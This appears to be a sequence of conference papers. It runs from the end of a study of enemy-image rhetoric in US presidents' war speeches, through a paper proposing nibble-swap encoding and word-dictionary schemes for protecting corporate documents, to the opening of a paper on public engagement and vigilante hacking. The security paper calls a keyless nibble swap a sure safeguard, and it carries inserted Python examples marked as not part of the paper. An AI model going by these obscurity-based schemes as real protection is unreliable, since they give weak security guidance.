The next two paired concepts on Zur’s chart are so close to the themes already discussed that already presented considerations need not be repeated in their context. ‘For civil rights – oppressive’ is essentially the same as ‘good caring leaders – tyranny’. At the same time the pair ‘defense department – war department’ does not present anything new to the ‘defensive – offensive’ theme that was discussed above. Instead, ‘peace’ and ‘belligerence’ (or ‘brutal expansionism’) offer additional insights.
In analyzing the Presidents’ speeches, on several occasions it was assured that one’s own party was only striving for peace. Peace was also expressed as a central goal of the future (Bush, 1990-12-24; Clinton, 1999-03-24b; Bush, 2003-03-08). In turn, it was said that the enemy had already broken peace with their expansionist activities. Furthermore, when negotiations had been offered as a means of solving problems, the enemy had refused them on a pretext of excuses or by simply failing to react to offers (Bush, 1991-01-16; Clinton, 1999-03-24a; Bush, 2003-03-16).
The enemy therefore does not even want peace, but war. As however one’s own side is not yet at war with the enemy and in this sense peace prevails, it is necessary to explain to the public why peace is not real peace. In the Presidents’ speeches (Bush, 1991-01-08; Clinton, 1999-03-24a; Bush, 2003-03-08) the current state of peace is presented as false, as in its shelter the enemy is acting aggressively, is upkeeping an unfair situation and is preparing for war. ‘Real peace’ can therefore only be achieved when the enemy is forced to give up their evil deeds and when the current unfair situation is corrected. Attacking the enemy is therefore the promotion of peace.
The last two closely related paired concepts (‘sacred – profane’ and ‘godly – atheist’) were not directly encountered in the Presidents’ speeches. An indirect reference is apparent in the conclusions of the speeches, in which the Presidents accordingly wish God’s blessing on their own country and people (Bush, 1991-01-16; Clinton, 1999-03-24a; Bush, 2003-03-19). It can be theoretically read that one’s own side was seen to be on God’s side and that one’s own objectives in this sense were sacred. The counter party would then have to be something else, if not atheist, at least something other than being basically secure in a real and true God. Then too the enemy’s actions were unholy.
The probable practical reason why a direct religious confrontation was avoided in speeches was related to two points. In the case of Iraq the fact that it was world-politically dangerous to present the controversy as a religious issue led to caution. Even if Saddam Hussein was presented as an atheist, it was possible that bringing forth religion would have led to increasing perceptions in the world of a battle between Christianity and Islam. In any case Saddam Hussein was formally a Muslim and Iraq was a country with a strong Muslim majority, and it was obviously in his interests if he could have presented himself as a champion of the Muslim faith and world against an aggressive Christian West. In the case of Kosovo, again the conditions were not right for bringing up religion, as the Albanians were mostly Muslim and the Serbs Christians. Mixed feelings would certainly have been aroused in the American public if statements would have been made about fighting alongside Muslims on behalf of the right faith against Christian enemies.
Based on what has been previously presented it can be seen that the classical elements in constructing the image of the enemy, which Zur for instance has classified, were in active use when the Presidents of the United States justified the military operations initiated by their country in the Persian Gulf and in Kosovo. The image of the enemy consisted of about ninety percent of these very elements, with minimal verbal and conceptual variations. The most frequently repeated paired concepts in defining one’s side and the opposing side were ‘humane – barbaric’, ‘good caring leaders – tyranny’, ‘defensive – offensive’ and ‘trustworthy – untrustworthy’. The other analyzed paired concepts based on Zur’s chart also systematically appeared in the speeches, although they were not repeated as often, or they were referred to more indirectly.
3. Situation-specific features complement basic features
Furthermore, the speeches repeated two additional elements, the importance of one’s own interests and the danger of the enemy. Both were necessary to give substance as to why immediately initiating a war was necessary. The speeches justified in many words and from several points of view why the enemy was completely wrong in principle and why one’s own side was completely right in principle. However, it could remain somewhat unclear to the audience why it was necessary to initiate a war against the enemy. Were the theoretical bases alone sufficient? Was it worth sacrificing one’s own soldiers on behalf of an abstract ‘justice’ to quell an equally abstract ‘injustice’? A partial answer was attempted in referring to stopping brutality in the speeches. War was necessary in order to prevent the enemy from killing and persecuting innocent victims in Kuwait, Iraq and Kosovo (Bush, 1991-01-09; Clinton, 1999-03-27; Bush, 2003-03-01). Here there was no question of theory, but the actual saving of human lives, which was a noble and generally laudable aim.
Nevertheless, some of the audience could still call into question the necessity of taking up war. Why sacrifice Americans to save Arabs living in the Middle East or Albanians living in Europe? This question could be answered by arguing that the question was not primarily about strangers living far away, but at stake were the Americans’ own vital national interests (Bush, 1990-12-24; Clinton, 1999-03-24a; Bush, 2003-03-01). What these interests specifically included was not necessarily stated, so that defining questions could be avoided. A few of the speeches however could refer on a general level to peace, stability, economic prosperity and above all to security. The most commonly used detailed reference was that war was necessary to ensure the Americans their own safety (Bush 1991-01-16; Clinton 1999-03-24b; Bush, 2003-03-04). At the same time the safety of residents in the Middle East and Europe was safeguarded, but at the top of the priority list was ensuring the secure future of one’s own community.
So that war could be presented as the protector of one’s own safety, there first had to be a grave threat to security. In the case of Saddam Hussein the appropriate threats were his alleged projects for weapons of mass destruction, especially the acquisition of nuclear weapons. If Saddam Hussein was successful in his project, the United States would no longer be safe any more than any other state. As the speeches stated (Bush, 1991-01-05; Bush, 2003-03-04), Saddam Hussein had already used weapons of mass destruction against his own people and he was also unpredictable. It was necessary to act immediately, so that the enemy would not have time to grow too strong and frightening. Persuasive rhetoric more generally attempts to bring about hasty decisions by presenting delay as disastrous (Luostarinen, 2002: 36). Thus, psychological pressure can be put on listeners not to remain reflecting on issues themselves. They are preferably directed to act quickly and without questioning the already thought-out models that their persuaders offer.
In Kosovo’s case it was not possible to refer to the threat created by weapons of mass destruction, as the Yugoslavian/Serbian leadership had not shown any interest in them. Instead, it was possible to exploit the image of the Balkans as a ‘powder keg’ that had allegedly sparked two world wars (Clinton, 1999-03-24a; Clinton, 1999-03-27). This was obviously a coarse simplification, and in the case of the Second World War in particular it was very unclear how even the formal reason for the outbreak of war could be situated in the Balkans, the area presumed prone to crisis. In spite of these factors the ‘powder keg’ concept was useful in the case of Kosovo because such a feature was commonly attached to the Balkans. In Clinton’s (1999-03-24b; 1999-03-26) speeches, immediately initiating acts of war against Yugoslavia was necessary so that the escalation and broadening of the crisis could be prevented. Any delay would only lead to greater damage and more victims because the problem had to be solved by force sooner or later. The logic of urgency was exactly the same as in the case of Iraq.
The analogy to the world wars was also used to explicitly justify the need for a rapid response. According to Clinton (1999-03-24a) the European democracies as well as the United States itself had made a great mistake in hesitating and had attempted to mediate for too long. How the experiences of the world wars could certainly prove that the evolution of Yugoslavia would be the same was of course unclear at the level of principle. The comparison, however, justified the claim that with a sufficient degree of probability the development would be the same: it would be foolish to make the same error a third time. At the same time the analogy to the world wars was fitting in justifying the war effort of the United States far from home. As the USA had already twice rescued Europe (Clinton, 1999-03-24a), it would ‘naturally’ once again resolve the crisis. According to this logic the world wars undoubtedly showed that the Europeans were not able to do so themselves. Thus, the United States was forced to participate, as in the light of history it had no choice.
The image that the Presidents created of the Persian Gulf in the years 1991 and 2003, as of Kosovo in 1999, was also, when considered as a whole, unconditional in the same way. The enemy was thoroughly evil, guilty of heavy crimes, and was preparing to carry out even more horrific acts soon. This ever-growing danger, which was already directed at the United States itself, definitely had to be eliminated now. One’s own side had done its utmost to restore peace and justice, but all sensible proposals to defuse the crisis foundered on the enemy’s reluctance to settle issues.

There remained no other option than the use of military force. This had to be undertaken under the requirements of law and morals and the guidance of human values. The responsibility for casualties and losses resulting from acts of war was the enemy’s alone, which had with its own actions forced the United States to react exactly as occurred in the spring of 1991, 1999 and 2003.
References
Aho, J. (1994) This thing of darkness, University of Washington Press, Seattle.
Bush, G. (1990-12-24) Christmas Message to American Troops, [online], Available: http://bushlibrary.tamu.edu/research/public_papers.php?id=2572&year=1990&month=12 [18 Nov 2010].
Bush, G. (1991-01-05) Radio Address to the Nation on the Persian Gulf Crisis, [online], Available: http://bushlibrary.tamu.edu/research/public_papers.php?id=2596&year=1991&month=01 [18 Nov 2010].
Bush, G. (1991-01-08) Message to Allied Nations on the Persian Gulf Crisis, [online], Available: http://bushlibrary.tamu.edu/research/public_papers.php?id=2598&year=1991&month=1 [18 Nov 2010].
Bush, G. (1991-01-09) Open Letter to College Students on the Persian Gulf Crisis, [online], Available: http://bushlibrary.tamu.edu/research/public_papers.php?id=2608&year=1991&month=1 [18 Nov 2010].
Bush, G. (1991-01-16) Address to the Nation Announcing Allied Military Action in the Persian Gulf, [online], Available: http://bushlibrary.tamu.edu/research/public_papers.php?id=2625&year=1991&month=1 [18 Nov 2010].
Bush, G. W. (2003-03-01) President’s Radio Address, [online], Available: http://georgewbush-whitehouse.archives.gov/news/releases/2003/03/20030301.html [18 Nov 2010].
Bush, G. W. (2003-03-04) President’s Remarks to American Medical Association, [online], Available: http://georgewbush-whitehouse.archives.gov/news/releases/2003/03/20030304-11.html [18 Nov 2010].
Bush, G. W. (2003-03-08) War on Terror, [online], Available: http://georgewbush-whitehouse.archives.gov/news/releases/2003/03/20030308-1.html [18 Nov 2010].
Bush, G. W. (2003-03-16) President Bush: Monday “Moment of Truth” for World on Iraq, [online], Available: http://georgewbush-whitehouse.archives.gov/news/releases/2003/03/20030316-3.html [18 Nov 2010].
Bush, G. W. (2003-03-19) President Bush Addresses the Nation, [online], Available: http://georgewbush-whitehouse.archives.gov/news/releases/2003/03/20030319-17.html [18 Nov 2010].
Clinton, W. (1999-03-24a) Statement by the President to the Nation, [online], Available: http://clinton6.nara.gov/1999/03/1999-03-24-remarks-by-the-president-to-the-nation-on-kosovo.html [19 Nov 2010].
Clinton, W. (1999-03-24b) Statement by the President on Kosovo, [online], Available: http://clinton6.nara.gov/1999/03/1999-03-24-statement-by-the-president-on-kosovo-air-strikes.html [19 Nov 2010].
Clinton, W. (1999-03-26) Text of a Letter from the President to the Speaker of the House of Representatives and the President Pro Tempore of the Senate, [online], Available: http://clinton6.nara.gov/1999/03/1999-03-26-text-of-a-letter-to-the-congress-on-kosovo.html [19 Nov 2010].
Clinton, W. (1999-03-27) Radio Address of the President to the Nation, [online], Available: http://clinton6.nara.gov/1999/03/1999-03-27-radio-address-on-nato-air-strikes-for-peace-in-kosovo.html [19 Nov 2010].
Clinton, W. (1999-04-03) Radio Address by the President to the Nation, [online], Available: http://clinton6.nara.gov/1999/04/1999-04-03-radio-address-on-peace-in-kosovo.html [19 Nov 2010].
Clinton, W. (1999-04-05) Statement by the President, [online], Available: http://clinton6.nara.gov/1999/04/1999-04-05-statement-by-the-president-on-kosovo.html [19 Nov 2010].
Gergen, K. and Gergen, M. (1986) Social psychology, Springer Verlag, New York.
Harle, V. (2000) The Enemy with a Thousand Faces. The Tradition of the Other in Western Political Thought and History, Praeger, Westport.
Luostarinen, H. (2002) ‘Propaganda, media ja sota’, in Huhtinen, A. (ed.) Propagandan renessanssi – Julkisen manipulaation paluu, Maanpuolustuskorkeakoulu, Helsinki.
Taylor, P. (2003) Munitions of the mind. A history of propaganda from the ancient world to the present era, Manchester University Press, Manchester.
Wunsch, S. (2002) ‘Image Research and the Enemy Image: The Soviet Union in Finnish Newspapers during the Winter War (November 30, 1939 – March 13, 1940)’, in Alenius, K., Fält, O. and Jalagin, S. (eds.) Looking at the Other. Historical study of images in theory and practice, Oulu University Press, Oulu.
Zur, O. (1991) ‘The love of hating: the psychology of enmity’, History of European Ideas, Vol 13, No. 4, pp 345-369.
Use of Compression Methods for Data Security Assurance
Dominic Asamoah 1 and William Oblitey 2
1 Kwame Nkrumah University of Science and Technology (KNUST), Ghana
2 Indiana University of Pennsylvania (IUP), Indiana, USA
dominic_asamoah@yahoo.co.uk
oblitey@iup.edu
Abstract: Organizations have documents that are not meant for public consumption. These documents provide the organizations with their competitive advantages. To maintain their respective competitive advantages and stay in business, the documents need to be secured and kept away from all unauthorized personnel. However, in this electronic age, protecting such documents from copying or even browsing has become rather difficult. Computer technology has made copying so easy, and yet it is difficult for people to become aware that such copying has been effected. To secure and protect such documents, various methods, including encryption techniques, have been employed. This paper suggests three methods that better ensure the security of such critical electronic data.

Keywords: authentication; critical document; encoding; encryption; intellectual property; security assurance
1. Introduction
Organizations spend huge amounts of their financial resources to safeguard their intellectual property (trade secrets). Corporate intellectual property, which is needed to maintain the corporation’s competitive advantage, ranges from formulae for products to strategic corporate plans. Firewalls are installed to restrict unwelcome access from outside the corporate subnet; intrusion detection systems are employed to detect and abort malicious activity; security tests are carried out to assess the effectiveness of the security measures employed to safeguard the corporate intellectual property and other information assets. However, the greatest threat to corporate intellectual property is the people threat, in particular the insider threat. Insider threats, or internal attacks, originate from inside the organization. They include disgruntled employees, curious users, or accidental misuse of the corporate computing systems. This paper presents methodologies for securing corporate intellectual property that take insider threats into consideration.
2. Known methods of securing data and their inherent problems
There are several methods presented in the literature (see, for example, Panko 2005) for protecting data on computing systems. These include physical protection, backup schemes, system logging, authentication schemes, and encryption techniques. We explain these methods and describe a few known problems with their use.
2.1 Physical protection
Physical protection places the document that needs to be secured under lock and key. Some corporations also rent bank vaults to add extra security to their documents. Backups are stored at separate locations from the original document, making them useful should the original copy be lost to fire or other natural disaster. However, keys are known to have been copied, and accessing the physically protected data still causes the data to be exposed to the person who is accessing it and also to any eavesdropper who might be around.
2.2 System logging
System logging is the collection of data on security events in a log file. The computer system holding the intellectual property can be set up to log any user who accesses that particular file. In addition to logging access to the file on the computer system, it has been suggested by Panko (2005) that the door to the room where that particular computer holds the intellectual data can also be logged for later analysis. Thus, if several incidents occur, an analysis of the door logs might be used to narrow the number of possible perpetrators to only a few. Again, hackers who know what they are about can either change their log entries or remove them from the file.
2.3 Authentication schemes
Authentication schemes are employed to get people to prove their identities before they are given access to the system or facility. The four types of authentication mechanisms (something you know, something you have, something you are, and something you produce) have been applied in various situations. For more critical situations, strong-authentication schemes which combine two or more of these four types have been employed.
2.4 Encryption techniques
Encryption is the process of converting an original message into a coded form that does not make sense to anyone who does not have a means of decoding it back to its original form. It is accomplished by using algorithms to manipulate the plaintext message into ciphertext. Encryption can thus be used in securing the corporate intellectual property. Several encryption techniques exist, but the classification is mainly into symmetric and asymmetric encryption. Symmetric encryption employs the same encryption algorithm and key for both enciphering and deciphering the text. A number of popular symmetric encryption systems are available. One of the more familiar is the Data Encryption Standard (DES), which was developed by IBM in 1977. Another is triple DES (3DES), which was developed as an improvement on DES. A successor of 3DES is the Advanced Encryption Standard (AES). The problem with simple DES is that the same input plaintext always produces the same output ciphertext, thus providing opportunities for skilled cryptanalysts to crack the DES key. 3DES is also slow and uses excessive amounts of memory.

Asymmetric encryption employs two different keys: one for encrypting the text and the other for decrypting it. The encrypting key is made public for use by anyone who wants to encrypt a message for the owner, but only the owner’s decrypting key can be used to decrypt the message. One of the most popular public key cryptosystems is the RSA system. However, several algorithms which exist for cracking the RSA system were reported by Boneh in 1999 and by Salah et al. in 2006.
3. The proposed methods
We propose three methods for securely storing corporate electronic intellectual property. These are an in-house encoding scheme for the document, and an object-oriented function for reducing the document into a coded form, using an algorithm close to those used in processing fractals. This encoded form of the document would then have to be expanded back into its original form for access. Our third method is the use of an encoded word function, which reduces the document to the minimal number of words employed in it and is expanded again for access.
3.1 Use of in-house encoding scheme
One sure way of assuring the data security of an extremely critical document is to encode the document using an in-house coding scheme that has been defined such that it is close to the ASCII, EBCDIC, or Unicode schemes but completely unique to the organization and known only to personnel with corporate security clearance (Fig. 1). To add to the security of the data, the encoded document would also be encrypted using a very strong encryption key. To store this document, it is essential that its characteristics, in the form of block size, the medium holding the document, and its last access date and time, be placed on file (Fig. 2). Even when an authorized person needs to access the document, that person must be accompanied by an assigned authenticator. Both this person and the authenticator would then check the block size of the document when uploaded into the computer system against the value on file before permission is granted to the person who wants to access the document. When this person is done with the document, the authenticator needs to join him or her to update the characteristics of the document on file for storage.
Algorithm Encode (ASCII)
    Read character as original code;
    Break code into two nibbles;
    Call nibbles z-nibble and v-nibble;
    Reverse nibbles;
    Reconstruct document with reversed nibbles (v-nibble concat z-nibble);
    Print document;
Figure 1: Sample in-house encoding scheme algorithm
Block Size    Medium    Last Accessed
X             Y         Z

x – size of file in bytes
y – type of medium on which file is stored
z – date of last access of file in ddmmyyyy format
Figure 2: File storage parameters
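The procedure of section 3.1 carried through in code, as an added example that is not part of the paper: the nibble swap of Figure 1, the storage record of Figure 2, and the block-size comparison made before the document is released. Sample document bytes, medium names and dates are constructed for the demonstration.

```python
"""Added example, not the paper's own code: the nibble-swap encoding of
Figure 1 together with the storage record and block-size check that
section 3.1 and Figure 2 describe. Byte values, media names and dates
used below are constructed for the demonstration."""
from collections import Counter
from dataclasses import dataclass


def swap_nibbles(data: bytes) -> bytes:
    """Figure 1: split every byte into its high nibble (z) and low nibble (v)
    and write the byte back as v-nibble followed by z-nibble."""
    return bytes(((b & 0x0F) << 4) | (b >> 4) for b in data)


# Swapping twice restores the original, so the same routine is both the
# Encode and the Decode step of the scheme.
encode = swap_nibbles
decode = swap_nibbles


def _check_ddmmyyyy(stamp: str) -> str:
    """Figure 2 stores the last access date as ddmmyyyy; reject anything else."""
    if len(stamp) != 8 or not stamp.isdigit():
        raise ValueError(f"date must be ddmmyyyy, got {stamp!r}")
    return stamp


@dataclass(frozen=True)
class StorageRecord:
    """Figure 2: X = block size in bytes, Y = storage medium, Z = last access."""
    block_size: int
    medium: str
    last_accessed: str


def make_record(encoded: bytes, medium: str, accessed: str) -> StorageRecord:
    """Place the encoded document's characteristics on file (section 3.1)."""
    return StorageRecord(len(encoded), medium, _check_ddmmyyyy(accessed))


class BlockSizeMismatch(Exception):
    """Raised when the uploaded document does not match the size on file."""


def open_for_access(encoded: bytes, record: StorageRecord,
                    today: str) -> tuple[bytes, StorageRecord]:
    """Section 3.1: the person and the authenticator compare the uploaded
    block size with the value on file before the document is decoded.
    Returns the decoded text and the record updated with today's date."""
    if len(encoded) != record.block_size:
        raise BlockSizeMismatch(
            f"uploaded {len(encoded)} bytes, {record.block_size} on file")
    updated = StorageRecord(record.block_size, record.medium,
                            _check_ddmmyyyy(today))
    return decode(encoded), updated


def same_byte_frequencies(original: bytes, encoded: bytes) -> bool:
    """The swap is a fixed, keyless permutation of the 256 byte values, so
    the encoded document has exactly the same frequency profile as the
    original. This is why section 3.1 also encrypts the encoded document
    with a strong key rather than relying on the encoding alone."""
    return (sorted(Counter(original).values())
            == sorted(Counter(encoded).values()))


if __name__ == "__main__":
    secret = b"Formula: 3 parts A to 1 part B"  # constructed sample document
    stored = encode(secret)
    record = make_record(stored, "tape", "18112010")
    text, record = open_for_access(stored, record, "07072011")
    print(text.decode(), record)
```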
3.2 Use of object-oriented functions
Another method for assuring the security of the data in an extremely critical document is to examine the document in terms of its constituent contents. Documents for digital storage may be text, images (including music scores), audio, or video. Images, audio, and video have much resemblance to fractals, and in most cases can be treated as such. Since fractals can be split into parts, each of which is a reduced-size copy of the whole body, the idea of singling out a part can be employed in securing the entire body of the critical document. Most text documents also tend to have parts that are repeated in other places within the document. Thus text documents could also be considered as some form of fractal, and the same technique of singling out the reduced-size part for later replication can also be applied in securing these text documents (Fig. 3).
Algorithm Text Fractal
    Let Q(n) represent the document;
    Let p1, p2, …, pn represent the phrases in Q(n);
    Let di represent the relative position of pi from the start of Q(n);
    Where pi = pj = pk = …;
        Drop pj, pk, …;
        Keep pi;
        Append dj, dk, … to the parameters of pi;
Figure 3: Algorithm for creating fractal function
This method employs the object-oriented programming compression scheme: it takes the central recurring piece of the document and treats that piece as an object. This object is represented as a block of data or image which is described once and can be reused as many times as desired. The object is a block of pre-assembled programming code that is a self-contained module. The module contains, or encapsulates, both a chunk of data and the processing instruction that may be called upon to be performed on that replicable data. Once the object becomes part of the program, the processing instruction may or may not be activated. Activation of the processing instruction happens only when the critical document needs to be regenerated. On regeneration, an alert is sent to the object and the operation involving that object is then performed. The performance of the operation is embedded within the processing instructions as part of the object.
The suggested method to secure the critical document is therefore to examine the original document as to whether it shows replicable parts. If so, then the reduced-size copy of the document can be captured into an object-oriented program’s function. The number of repetitions of the reduced-size copy, when used to invoke the function, would reproduce the document. Of course, limits and boundaries will be needed in the function to ensure that an exact replica of the original document is what is always reproduced. This way, the organization would not maintain any paper documents of the critical data and would rather employ the algorithm to reproduce a soft copy any time the document is needed.
3.3 Use of encoded word function
A third method that is being proposed, and which seems to have been overlooked by security experts, is what this paper calls the encoded word function scheme. This scheme takes the critical document and encodes the various words in it with reference to their respective positions of occurrence. It then uses the words to build a data dictionary for use by the function (Fig. 4). The words in the data dictionary are kept unique, and their frequency of occurrence within the document is referenced against each word, as to its position on a page and on a line. The function thus only expands the data dictionary to recreate the document by taking each word in turn and following the suggested links in the data dictionary to determine the locations of those words (Fig. 5). Thus both function and data dictionary are needed to recreate the critical document. The critical document cannot be recreated by either function or data dictionary by itself. Both must be employed to recreate the critical document. To further enhance the security of the critical document by this method, the source code of the function should be kept secret, perhaps in a locked cabinet, and only the object code used when required. The data dictionary used by the function can also be encrypted, and decryption would then be required before the function can operate on it.
Word    Position of Occurrence in Document
        Page #      Line #      Positions on line
w1      x,y,z…      a,b,c…      i,j,k,…
w2      x,y,z…      a,b,c…      i,j,k,…
w3      x,y,z…      a,b,c…      i,j,k,…
…       …           …           …
wn      x,y,z…      a,b,c…      i,j,k,…
Figure 4: Data dictionary for encoded word function
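The encoded word function of section 3.3 as an added example, not the paper's own code: building the Figure 4 data dictionary (each unique word with its page, line and on-line positions) and expanding it again with the nested loop of Figure 5. Since the one stored copy of a repeated word carries the positions of all its occurrences, it is also the word-level instance of the Figure 3 idea in section 3.2. The two-page sample document and the page/line separators (form feed, newline) are constructed assumptions.

```python
"""Added example, not the paper's own code: the encoded word function of
section 3.3 (Figures 4 and 5). The sample document is constructed; pages
are separated by form feed, lines by newline, words by single spaces."""
from collections import defaultdict

# Constructed two-page document; the word "part" recurs four times.
SAMPLE = ("the formula uses part a\n"
          "the formula uses part b\f"
          "mix part a with part b")

Place = tuple[int, int, int]  # (page, line, position on line), all 1-based


def build_dictionary(document: str) -> dict[str, list[Place]]:
    """Figure 4: map every unique word to the places where it occurs."""
    table: dict[str, list[Place]] = defaultdict(list)
    for page_no, page in enumerate(document.split("\f"), start=1):
        for line_no, line in enumerate(page.split("\n"), start=1):
            for pos, word in enumerate(line.split(), start=1):
                table[word].append((page_no, line_no, pos))
    return dict(table)


def frequency(table: dict[str, list[Place]], word: str) -> int:
    """Figure 4 references each word's frequency; it is its place count."""
    return len(table.get(word, []))


def _contiguous(keys) -> bool:
    """True when the keys are exactly 1..n with nothing missing."""
    return sorted(keys) == list(range(1, len(keys) + 1))


def recreate_document(table: dict[str, list[Place]]) -> str:
    """Figure 5: for each word, walk its pages, lines and positions and put
    the word back; then read the grid out in order. A table that maps two
    words to one slot, or leaves a gap in a page or line, is rejected,
    since the exact original could not be reproduced from it."""
    grid: dict[int, dict[int, dict[int, str]]] = defaultdict(
        lambda: defaultdict(dict))
    for word, places in table.items():
        for page_no, line_no, pos in places:
            if pos in grid[page_no][line_no]:
                raise ValueError(
                    f"page {page_no} line {line_no} position {pos} used twice")
            grid[page_no][line_no][pos] = word
    if not _contiguous(grid):
        raise ValueError("page numbers have a gap")
    pages = []
    for page_no in sorted(grid):
        if not _contiguous(grid[page_no]):
            raise ValueError(f"line numbers on page {page_no} have a gap")
        lines = []
        for line_no in sorted(grid[page_no]):
            slots = grid[page_no][line_no]
            if not _contiguous(slots):
                raise ValueError(f"page {page_no} line {line_no} has a gap")
            lines.append(" ".join(slots[p] for p in range(1, len(slots) + 1)))
        pages.append("\n".join(lines))
    return "\f".join(pages)


if __name__ == "__main__":
    table = build_dictionary(SAMPLE)
    print(len(table), "unique words; 'part' occurs",
          frequency(table, "part"), "times")
    assert recreate_document(table) == SAMPLE
```

Reconstruction needs only the table and the few lines above, so in practice the document's confidentiality rests on the encryption of the data dictionary that section 3.3 recommends rather than on keeping the function's source in a locked cabinet.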
Algorithm Recreate Document
    For word = 1, n;
        Read wi;
        For page = 1, m;
            For line = 1, j;
                For postn = 1, p;
                    Print wi;
Figure 5: Algorithm for document reproduction

4. Conclusion
We have presented three methods for securely storing corporate electronic intellectual property. The first was an in-house encoding scheme which took the characters in the document and broke each down into the nibbles of the machine’s encoding scheme. The nibbles were then reversed for storage and would be reconstructed for future access to the document. The second was an object-oriented function that reduced the document into a coded form, which employed an algorithm similar to those used in processing fractals. This encoded form of the document would then have to be expanded back into its original form for access. Our third method was the use of an encoded word function which reduced the document to the minimal number of words employed in it, and would have to be expanded again for access.
References
Boneh, D. (1999) “Twenty years of attacks on the RSA cryptosystem,” Notices of the American Mathematical Society (AMS), Vol. 46, No. 2, pp. 203–213.
Cormack, G. V. (1985) Data Compression on a Database System, Commun. ACM, Vol. 28, No. 12.
Held, G. (1987) Data Compression: Techniques and Applications, Hardware and Software Considerations, John Wiley & Sons Ltd.
Mehlhorn, K. (1980) An Efficient Algorithm for Constructing Nearly Optimal Prefix Codes, IEEE Trans. Inform. Theory, Vol. 26, No. 5.
Panko, R. R. (2005) Corporate Computer and Network Security, Prentice Hall, Upper Saddle River, NJ.
Salah, I. K., Darwish, A. and Oqeili, S. (2006) “Mathematical attacks on RSA cryptosystem,” Journal of Computer Science, August.
Cyber Security: Time for Engagement and Debate
Debi Ashenden
Cranfield University, Swindon, UK
d.m.ashenden@cranfield.ac.uk
Abstract: This paper explores the issue of public engagement with cyber security issues and positions it as a key factor in ensuring cyber security. Reported incidents of vigilante hacking are given as examples of the role of the public in cyber security. The case is made that in order to ensure public engagement and to manage the potential threat from vigilante hackers we need more inter-disciplinary academic research and better quality journalism. The role of the public and the link between the state and the public as mediated through cyberspace is used as a case study to set the context. To explore the issue of inter-disciplinary research a brief review of current academic literature is outlined. The topic of better quality journalism is examined using content analysis of newspaper reports focusing on the Stuxnet worm. The paper concludes that, at a very basic level, without increased academic debate or better quality journalism we will have little to inform our public engagement programme. One area to be addressed that emerges strongly through the research is the need for a lexicon and framework for discussing cyber security. This is necessary, at least at a high level, in order to conceptualise the problems and to support work that crosses academic disciplines. A suggested high level lexicon is presented together with a simple framework to facilitate engagement and debate.

Keywords: cyber security, debate, engagement, lexicon, framework
1. Introduction
It has been a busy eighteen months in the UK for the seemingly ubiquitous term ‘cyber’. It started with the publication of the UK’s Cyber Security Strategy in 2009, closely followed by the establishment of the Office of Cyber Security and the Cyber Security Operations Centre. Momentum gathered, and in the media we have seen reporting of the Stuxnet worm as an instance of ‘cyber war’. Also in recent months we have had speeches from the Director General of the Security Service and the Director of GCHQ discussing ‘cyber espionage’ and ‘cyber security’ respectively. Finally we now have the Strategic Defence and Security Review categorising cyber security as a Tier One threat and outlining plans to invest £650m in a ‘National Cyber Security Programme’ over the next four years. It is a busy time for ‘cyber’.
Cyberspace has been compared to land, sea and air as a space within which we need to protect and maintain our position as a nation state. Intuitively this may seem like a helpful comparison but, of course, cyber is very different from land, sea and air in so many ways. As a concept ‘cyber’ is a slippery term: it is hard to pin down, has different meanings across different communities and is a prefix for many other words. When put before ‘espionage’ and ‘warfare’ discussions are usually highly classified, but put cyber before ‘security’ and discussions can be many and varied across both the public and the private sector. It is not surprising then that when the term ‘cyber’ is used it is invariably quickly followed by a muttered ‘whatever that means’ under the speaker’s breath.
The purpose of this paper is to put the case for why we now need a deeper debate about cyber, in particular about specific issues that we can foresee. We have given ‘cyber’ a good airing but now we need to move on and examine in detail and with precision. An issue that will serve as illustration is the role of the public and the link between the state and the public as mediated through cyberspace. The individual can easily be both a vulnerability and a threat in this space and without debate and public engagement public activity could have real implications for our ability to protect and maintain our security. To tease out such issues in order to debate them we will need to cross disciplines from social sciences to technology and from law to ethics. To engage with the public we will need to develop access to in-depth journalism. None of this will be possible, however, without at least some precision in the way we use the term ‘cyber’.
2. The Problem: The need for public engagement
Public engagement is a vital part of any strategy for cyber security because the public is inside the threat environment. There are ongoing Government campaigns to get the public online: free tuition, help to buy equipment and access in public places. The public are taking an active role in cyberspace in increasing numbers and their usage is largely uncontrolled. In the space of land, sea and air the home population can often be physically separated from the threat environment but they are an integral part of cyberspace. As a result the public can be both a vulnerability and a threat. To counter the risk this poses different forms of public engagement will be necessary.
There is an acknowledgement in the UK Cyber Security Strategy of the role of the public and their responsibility to protect themselves and their technology. With the connectivity between public and private sector systems, and with increasing numbers of individual citizens being encouraged to interact online, the need to protect domestic networks and computers has never been greater. Individuals have an important role to play in delivering the 80% of cyber security described by the Director of GCHQ (2010); they need to understand how to ensure that they are not inadvertently facilitating attacks (for example, by allowing their machines to be recruited into a botnet). A balance has to be struck, however, between making the public aware of the risks of online activities and encouraging them to exploit the benefits available. A population that loses trust in cyber is likely to disengage from using online government services and in the current economic climate this would have significant consequences. To counter the vulnerability posed by the public we have public/private partnerships such as Get Safe Online to educate and inform, but there is scope to expand and add depth to such initiatives.
The public, however, are also on the inside of the remaining 20% of cyber security – the complex threat of cyber espionage, cyber terrorism and cyber war. So what might this threat look like? It is generally accepted that most of the tools and techniques necessary to carry out cyber attacks are already available online. It is conceivable that an event could take place in cyberspace which would prompt retaliation from sections of the home population. We have already seen the potential of social networking sites for bringing together and assisting groups of people with a common outlook to mobilize on specific issues. Attacks launched by such groups would undoubtedly break the law and constitute vigilante activity. On a small scale presumably this could be handled by law enforcement agencies in the same way that any other vigilante activity is handled. On a larger scale, where there could effectively be mob activity online, this may not be practicable (it is easy to see that at the very least forensic computing resources could be quickly exhausted). Such a scenario exemplifies why there needs to be a debate across technical, legal, policy and ethical boundaries about how to respond. It is highly likely that in such circumstances a number of agencies will need to work together and appropriate governance structures would need to be in place.
This leads us into an examination of vigilante activity as evidence of the need to consider the role of the public as a threat. Is this notion of the ‘patriotic hacker’ too far-fetched to warrant consideration? It seems not. Dorothy Denning (2003) cites the examples that occurred in response to the 9/11 attacks. The hacker Fluffi Bunni redirected tens of thousands of web sites to one on which he had left a message. A group called the Dispatchers, led by Hackah Jak, defaced hundreds of web sites and threatened to attack web servers and internet access in Afghanistan and other nations that were perceived to be supporting terrorism. There are instances of nation states that either turn a blind eye to patriotic hackers or actively encourage them. One such instance is China’s mobilisation of students against Japan (Nye, 2010). Most recently we have seen the ‘hacktivist’ group Anonymous launch distributed denial of service attacks against Mastercard, Visa and PayPal in protest at the withdrawal of their financial services from WikiLeaks (The Guardian, 28th January 2011). Without doubt it is easy to see how the public can become a threat in cyberspace and the Government will need to be able to manage, minimise or curtail their actions.
